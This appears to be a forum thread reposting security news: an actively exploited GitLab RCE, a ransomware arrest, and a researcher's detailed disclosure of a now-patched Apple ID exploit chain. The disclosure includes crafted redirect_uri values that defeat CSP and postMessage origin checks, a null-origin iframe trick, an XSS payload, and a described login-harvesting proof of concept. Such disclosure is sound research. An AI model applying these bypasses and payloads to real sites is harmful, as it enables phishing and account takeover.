  16. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks. Tracked as CVE-2021-22205, the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3. In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions. Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday. Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
  17. Everyone knows what’s inside a computer isn’t really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn’t. In the real world, everything has a certain mooring we’re all attuned to. You put money in a big strong safe, and, most likely if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they’re expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they’d dance, but that’s not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense. The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It’s easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you’re careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that’s why I’ve always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole. Before the pandemic, I spent a lot of time researching the way web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the ‘Desktop Application’, the consequences of which I summarised one sunny day in Miami. I’m not really a very good security researcher, so little of my work sees the light of day because the words don’t always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I’ll tell you about now. But I can’t tell you about those. Perhaps naïve, it didn’t occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn’t have any formal way of paying you for bugs: you just emailed them, and hoped for the best. Maybe you’d get something, maybe you wouldn’t — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me. Part 1: The Doorman’s Secret Computer systems don’t tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That’s down to a basic rule of the web: different websites don’t default to sharing information to each other. ICloud, then is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple’s usual apple.com yet its core feature is of course logging into your Apple iCloud account. More interestingly still, you might notice that most login systems for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud’s doesn’t. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address: https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest Here, Apple is using OAuth 2, a capability based authentication framework. ‘Capability based’ is key here, because it means that a login from Apple.com doesn’t necessarily equate to one from iCloud.com, and also not all iCloud logins are necessarily the same either — that’s how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page. response_mode=web_message seems to be a switch that turns this on. If you visit the address, you’ll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page then you could play around with the presentation of the login page to steal Apple user data (‘Redress Attack’). Apple’s code is detecting that it’s not being put in the right place and blanks out the page. In typical OAuth, the ‘redirect_uri’ specifies where the access is being sent to; in a normal, secure form, the redirect uri gets checked against what’s registered for the other, ‘client_id’ parameter to make sure that it’s safe for Apple to send the special keys that grant access there — but here, there’s no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page. In a twist of fate, this one fell prey to a similar bug to the one from how to hack the uk tax system, i guess, which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs, web addresses are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome Devtools, I found that a redirect_uri of ‘https://abc@www.icloud.com’ would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is how do we get the iCloud login page into our page? Consult this reference on embed control: X-Frame-Options: DENY Prevents any kind of embedding pros: ancient, everyone supports it cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic X-Frame-Options: ALLOW-FROM http://example.com Only allows embedding from a specific place pros: A really good idea from a security perspective cons: was literally only supported by Firefox and Internet Explorer for a short time so using it will probably make you less secure Content-Security-Policy: frame-ancestors Only allows embedding from specific place(s) pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls cons: probably very old browsers will ignore it If you check Chrome DevTools’s ‘network’ panel, you will find the AppleID signon page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing), and Content-Security-Policy: frame-ancestors. Here’s a cut-down version of what the Content-Security-Policy header looks like when ‘redirect_uri’ is set to the default “https://www.icloud.com/” Content-Security-Policy: frame-ancestors ‘self’ https://www.icloud.com This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@icloud.com? Content-Security-Policy: frame-ancestors ‘self’ https://abc@www.icloud.com Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to ‘https://mywebsite.com;@icloud.com/’, then, the AppleID server continues to think all is well, but sends: Content-Security-Policy: frame-ancestors ‘self’ https://mywebsite.com;@www.icloud.com This is because the ‘URI’ language that’s used to express web addresses is contextually different to the language used to express Content Security Policies. ‘https://mywebsite.com;@www.icloud.com’ is a totally valid URL, meaning the same as ‘https://www.icloud.com’ but to Content-Security-Policy, the same statement means ‘https://mywebsite.com’ and then some extra garbage which gets ignored after the ‘;’. Using this, we can embed the Apple ID login page in our own page. However, not everything is quite as it seems. If you fail to be able to embed a page in chrome, you get this cute lil guy: But, instead we get a big box of absolutely nothing: Part 2: Communicating with the blank box Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message: {"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"} This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to ‘https://idmsa.apple.com/appleauth/jslog’, assumedly to report to Apple that an error occurred. Chrome DevTools’ ‘sources’ panel has a component on the right called “XHR/fetch Breakpoints” which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there’s this: new Promise(function(e, n) { it.call({ destination: window.parent, publicProcedureName: "ready", params: [{ iframeTitle: d.a.getString("iframeTitle") }], onSuccess: function(t) { e(t) }, onError: function(t) { n(t) }, retries: p.a.meta.FEConfiguration.pmrpcRetryCount, timeout: p.a.meta.FEConfiguration.pmrpcTimeout, destinationDomain: p.a.destinationDomain }) } The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready and failing over and over (see: retries). This communication is happening over the postMessage (the ‘pm’ of pmrpc ). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com ; then, since our embedding page is not that domain, there’s a failure. We can inject code into the AppleID Javascript and the iCloud javascript to view their version of this conversation: AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“ready”],”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2"} AppleID tells iCloud it’s ready to receive messages. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2",”result”:true} iCloud responds to the ping request with a ‘pong’ response. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”ready”,”params”:[{“iframeTitle”:” Sign In with Your Apple ID”}],”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55"} AppleID tells iCloud that the frame is named ‘Sign in with Your Apple ID’ (I’m guessing to make the title of the page correct). iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55",”result”:true} iCloud acknowledges receipt of the title. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“config”],”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”} AppleID asks iCloud if it wants the login to be configured. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”,”result”:true} iCloud acknowledges receipt of the configuration request, and says that it does, yes want the login to be configured. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”config”,”params”:[],”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”} AppleID asks iCloud for a login dialog configuration. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:{“data”:{“features”:{“rememberMe”:true,”createLink”:false,”iForgotLink”:true,”pause2FA”:false},”signInLabel”:”Sign in to iCloud”,”serviceKey”:”d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d”,”defaultAccountNameAutoFillDomain”:”icloud.com”,”trustTokens”:[“HSARMTnl/S90E=SRVX”],”rememberMeLabel”:”keep-me-signed-in”,”theme”:”dark”,”waitAnimationOnAuthComplete”:false,”logo”:{“src”:”data:image/png;base64,[ … ]ErkJggg==”,”width”:”100px”}}}} iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption “Sign in to iCloud”, and, for example whether a link should be provided for if the user forgets their password. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:true} iCloud confirms receipt of the login configuration. In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here. Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can’t just impersonate iCloud — by having every postMessage have a targetOrigin, basically a specified destination of the webpage. It’s not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place. Part 3: Snot-Nosed Kid Mode This one isn’t as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri , through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary. By placing a breakpoint at the destinationDomain line we had before, we can see that unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, ‘https://mywebsite.com;@wwwicloud.com’ is being passed to postMessage, as though it were this code: window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com"); At first, this seems like an absolute impasse. In no possible way is our page going to be at the address ‘https://mywebsite.com;@www.icloud.com’. However, once you go from the reference documentation, to the technical specification the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this: Let parsedURL be the result of running the URL parser on targetOrigin. If parsedURL is failure, then throw a “SyntaxError" DOMException. Set targetOrigin to parsedURL’s origin. Crucially, despite “https://mywebsite.com;@www.icloud.com” being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this allows us purchase to sneak some extra content in there to potentially confuse other parts of AppleID’s machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com"); This information eventually bubbles down to the destinationDomain we’re trying to mess with. When toying with ‘redirect_uri’, I found that there’s a bug in the way this functionality is programmed in Apple’s server. For an input ‘https://mywebsite.com;"@www.icloud.com’ (note the double quote), this code is produced: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); The double quote is ‘escaped’ with a ‘\’ to ensure that we don’t break out of the quoted section and start executing our own code, however something a little odd happens when we input instead ‘https://mywebsite.com;%22@www.icloud.com’. ‘%22’ is what you get from ‘encodeURIComponent’ of a double quote, the opposite of what apple is doing here. bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before it even reaches this generated Javascript. Then, the generated Javascript is again performing the same decoding. Someone made the mistake of doing the same decoding on the client and server, but it didn’t become a functionality breaking bug because the intended usage doesn’t have any doubly encoded components. We can, however introduce these. 😉 Because the server is using the decodeURIComponent-ed form, and the client is using the twice decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to: https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com This order of operations then happens: AppleID’s server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com AppleID’s server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com , and gets https://www.icloud.com , which passes the first security check AppleID’s server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: allow-origin https://mywebsite.com%3F mywebsite.com;@www.icloud.com The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both ‘https://mywebsite.com%3f’ (which is nonsense) and ‘mywebsite.com’ (which is us!!!!). This passes the second security check and allows the page to continue loading. AppleID’s server generates the sign in page with the Javascript bootData.destinationDomain = decodeURIComponent(“https://mywebsite.com%3F mywebsite.com;@www.icloud.com"); The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com The browser when performing postMessage parses an origin again again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com . The ‘?’ causes everything after it to be ignored, resulting in the target origin ‘https://mywebsite.com’. This passes the third security check. However, this is only half of our problems, and our page will stay blank. Here’s what a blank page looks like, for reference: Part 4: Me? I’m Nobody. Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is also totally different from the one that is used for a postMessage send. The lowest-level browser mechanism that AppleID must be inevitably calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this: if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!"); This is just a ‘strict string comparison’, which means that we would, in theory have to impossibly be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com which has no chance of ever happening on God’s green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by ‘processJSONRpcRequest’, defined in ‘pmrpc.js’. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows: 254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin) This checks a value called ‘shouldCheckACL’ to determine if security is disabled, I guess 😉 That value, in turn comes from line 221: 221: shouldCheckACL : !isWorkerComm And then isWorkerComm comes to us via lines 205–206: 205: var eventSource = eventParams.source; 206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null; ‘eventParams’ is the event representing the postMessage, and ‘event.source’ is a reference to the window (i.e. page) that sent the message. I’d summarise this check as follows: if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com")) That means the origin check is completely skipped if message.source is ‘null’. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message for testing, its ‘source’ can be then set to ‘null’, and then you no longer need to worry about security getting in the way. Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event’s source is always a ‘WindowProxy object’, so it can never be ‘null’ instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag ‘allow-same-origin’, which, if not present in a sandboxed iframe sets the ‘Sandboxed origin browsing context flag’ (defined in section 7.5.3) which ‘forces the content into a unique origin’ (defined in section 7.5.5), which makes the window an ‘opaque origin’ (defined in section 7.5), which when given to Javascript is turned into null (!!!!). This means when we create an embedded, sandboxed frame, as long as we don’t provide the ‘allow-same-origin’ flag, we create a special window that is considered to be null , and thus bypasses the pmrpc security check on received messages. A ‘null’ page however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID with all the hard work we did before, and a ‘null’ page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks since it is a ‘null’ window, it must have generated them itself. You can read my reference implementation of this forwarding code, here. Part 5: More than Phishing Now that AppleID thinks we’re iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials? In our current state, having tricked Apple ID into thinking that we’re iCloud, we have a little box that fills in your apple email very nicely. When you log in to our embed we get an authentication for your Apple account over postMessage. Even if you don’t 2FA! This is because an authentication token is granted without passing 2FA for iCloud ‘Find My’, used for finding your potentially lost phone (which you might need to pass 2FA otherwise). However, this is basically phishing — although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page just the same. We need more. We’re already in a position of extreme privilege. Apple ID thinks we’re iCloud, so it’s likely that our interactions with the Apple ID system will be a lot more trusting with what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}} That’s all well and good, but what about the options that iCloud can use, but simply chooses not to? They won’t be here, but we can use Chrome DevTools’ ‘code search’ feature to search all the code the Apple ID client software uses. ‘signInLabel’ makes a good search term as it probably doesn’t turn up anywhere else: d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel), It looks like all of these settings like ‘signInLabel’ are part of this ‘envConfigFromConsumer’, so we can search for that: this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test")) d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()), n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)), n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)), n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)), n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)), n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)), n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")), n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())), i = d()(w.a, "envConfigFromConsumer.verificationToken", ""), These values we know from our config get given different names to put into a template. For example, ‘envConfigFromConsumer.features.footer’ becomes ‘showFooter’. In DevTools’ network panel, we can search all resources, code and otherwise the page uses for where these inputs end up: {{#if showRememberMe}} <div class="si-remember-password"> <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked"> <label id="remember-me-label" class="form-label" for="remember-me"> <span class="form-choice-indicator"></span> {{rememberMeText}} </label> </div> What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret. ‘{{value}}’ statements work like you expect, safely putting content into the page; but ‘{{{value}}}’ extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let’s see if an Apple engineer made a typo by searching the templates for “}}}”: {{#if showLearnMoreLink}} <div> {{{learnMoreLink}}} </div> {{/if}} {{#if showPrivacy}} <div class="label-small text-centered centered tk-caption privacy-wrapper"> <div class="privacy-icon"></div> {{{privacyText}}} </div> {{/if}} Perfect! From our previous research, we know that ‘privacyText’ comes from the configuration option ‘envConfigFromConsumer.privacy’, or just ‘privacy’. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" } , Apple ID will execute our code and show a little popup indicating what domain we have taken over: Part 6: Overindulgence Now it’s time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn’t scary enough. We have control over idmsa.apple.com, the Apple ID server browser client, and so we can access all the credentials saved there — your apple login and cookie — and in theory, we can ‘jump’ to other apple login windows. Those credentials are all stored in a form that we can use to take over an apple account, but they’re not a username and password. That’s what I think of as scary. For my proof of concept, I: Execute my full exploit chain to take over Apple ID. This requires only one click from the user. Present the user with a ‘login with AppleID’ button by deleting all the content of the Apple ID login page and replacing it with the standard button Open a new window to the real, full Apple ID login page, same as apple would when the button is clicked With our control of idmsa.apple.com, take control over the real Apple ID login dialog and inject our own code which harvests the logins as they are typed Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page — if the user checks if they came from a legitimate Apple site, they’ll just see apple.com and be unable to go back. Full commented source code can be found here. Video demonstration of the Proof of Concept on desktop Although I started this project before apple had its bug bounty program, I reported it just as the bug bounty program started and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I’m trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access “a small amount of sensitive data”. Hopefully other researchers are paid more! I also hope this was an interesting read! I took a really long time to write this with the pandemic kind of sapping my energy, and my sincere hope that despite the technical complexity here, I could write something accessible to those new to security. Thomas Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of fame 🥺🥺 Full timeline follows this article. edit: Apple says my Hall of Fame will happen in September! edit: September is almost over and it hasn’t happened! Timeline Report to fix time: 3 days Fix to offer time: 4 months, 3 days Payment offer to payment time: 4 months, 5 days Total time: 8 months, 8 days Friday, November 15th 2019 First apple bug, an XSS on apple.com reported Saturday, November 16th 2019 Issues noticed in Apple ID The previous bug I reported has been mitigated, but no email from Apple about it Thursday, November 21st 2019, 3:43AM GMT First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple user’s information. Thursday, November 21st 2019, 6:06AM GMT Templated response from Apple, saying they’re looking into it Thursday, November 21st 2019, 8:20PM GMT Provided first Apple ID proof of concept which injects malicious code, along with some video documentation. Sunday, November 24th 2019 The issue is mitigated (partially fixed) by Apple Thursday, November 28th 2019 Ask for updates Wednesday, December 4th 2019 I try to pull some strings with friends to get a reply Tuesday, December 3rd 2019 Apple tells me there is nothing to share with me December 10th 2019 I ask if there is an update Friday, January 10th 2019 I get an automated email saying, in essence (1) don’t disclose the bug to the public until ‘investigation is complete’ and (2) Apple will provide information over the course of the investigation. Email for an update Wednesday, January 29th 2020 Ask for another update (at the 2 month mark) Friday, January 31st 2020 Am asked to check if it’s been fixed. Yes, but not exactly in the way I might have liked. Sunday, February 2nd 2020 At Schmoocon, a security conference in Washington DC I happen to meet the director of the responsible disclosure program. I talk about the difficulties I’ve had. Tuesday, February 4th 2020 Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame as of August 2021, I have still not been publicly credited. I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later. Saturday, February 15th 2020 I ask for an update on status Monday, February 17th 2020 Apple responds: no updates. I ask when I’ll hear back Friday, February 21st 2020 I contact the director of the program with the details I got at schmoo, asking when the expected turnaround on bugs is Monday, March 2nd 2020 Apple responds. They say they have no specfic date Tuesday, March 3rd 2020 The director responds, saying they don’t give estimates on timelines, but he’ll get it looked into Tuesday, March 24th 2020 Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there Sunday, March 29th 2020 Enroll in the Apple Developer program, and ask when I’ll be able to disclose publicly. Tuesday, March 31st 2020 Told to accept the terms and set up my account and tax information (I am not told anything about disclosure) Tuesday, March 31st 2020 Ask for more detailled instructions, because I can’t find out how to set up my account and tax information (this is because my Apple Developers application has not yet been accepted) Thursday, April 2nd 2020 Ask if this is being considered as a generic XSS because the payout seems weird compared to the examples Tuesday, April 28th Apple replies to request for more detailed instructions (it’s the same thing, but reworded) May 13th 2020 I ask for an update May 18th 2020 Am told the money is “in process to be paid”, with no exact date but expected in May or early June. They’ll get back when they know. May 23rd 2020 I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate. May 18th 2020 I ask again when I can disclose. June 8th 2020 I ask for some kind of update on payment or when I can disclose. June 10th 2020 I am informed that there is ‘a new process’. The new process means I pay myself for my Apple Developers account, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He’s no longer with Apple. June 15th 2020 Apple asks me to provide an ‘enrolment ID’. June 15th 2020 I send apple a screenshot of what I am seeing. All my application shows is ‘Contact us to continue your enrolment’. I say I’m pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified (2) when I can disclose this and (3) what I am missing to get paid I also rant about it on twitter, which was probably the most productive thing I did to get a proper response in retrospect June 19th 2020 Apple gets in touch, saying they’ve completed the account review and now I need to set up a bank account to get paid in. Apple says they’re OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure Thursday, July 2nd 2020 The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by, and asks me to correct where I say I found this bug only “a few days ago” in the draft I wrote 🤔 July 29th 2020 I get paid … the pandemic happens 12 August 2021 I finish my writeup! Amendments 22/Aug/21: Fixed link to ‘full source code’, which originally linked to only a very small portion of the full source. Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
      • 4
      • Thanks
      • Upvote
  18. Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." Besides the two arrests, the international police operation witnessed a total of seven property raids, leading to the seizure of $375,000 in cash and two luxury vehicles costing €217,000 ($251,543), as well as the freezing of cryptocurrency assets worth $1.3 million. The suspects are believed to have demanded hefty sums ranging anywhere between €5 to €70 million as part of their extortion spree, and are connected to a gang that's staged ransomware attacks against more than 100 different companies, 